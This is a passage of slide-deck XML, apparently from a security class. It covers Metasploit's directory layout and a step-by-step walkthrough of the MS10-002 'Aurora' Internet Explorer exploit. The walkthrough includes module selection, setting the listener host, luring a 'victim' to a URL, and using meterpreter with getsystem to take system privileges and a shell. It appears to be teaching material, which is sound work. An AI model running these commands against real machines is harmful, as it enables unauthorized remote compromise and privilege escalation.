            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C5BA5E3-A804-4234-BADB-849277D27449}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect t="28948" r="20753" b="38255"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="149096" y="1706511"/>
            <a:ext cx="8845807" cy="2059244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3817450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Metasploit</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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>Metasploit is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>a test environment provides a secure place to perform penetration testing and security research, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>used by attackers and defenders. There are lots of preloaded modules, tools, scripts etc.. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/data/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/lib/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/modules/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/plugins/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/scripts/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>ls /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>-framework/tools/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46927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Privilege Escalation Using Aurora</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Tx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;75;p15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9CA691-858A-4980-BEEC-8CD9EFF1C89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>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1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>This will use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aurora script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>in Metasploit, which exploits a memory corruption flaw in internet explorer. To begin with, open the Metasploit framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search aurora </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to check the location of the script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use exploit/windows/browser/ms10_002_aurora</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> check the variables </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>svrhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uripath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> can give any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> you </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>wnat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Give the victim the using URL and when the victim is connected to session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessions -l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to see the existing session</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3128839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Privilege Escalation Using Aurora</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Tx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;75;p15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9CA691-858A-4980-BEEC-8CD9EFF1C89F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>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1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sessions –i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session_id</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>If you got the correct session id you will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> command which means you are now in the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>To check the information in the victim’s machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>priv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> could be preloaded, if not use this to load privilege escalation module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>getsystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> elevate your permission level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to access the windows shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
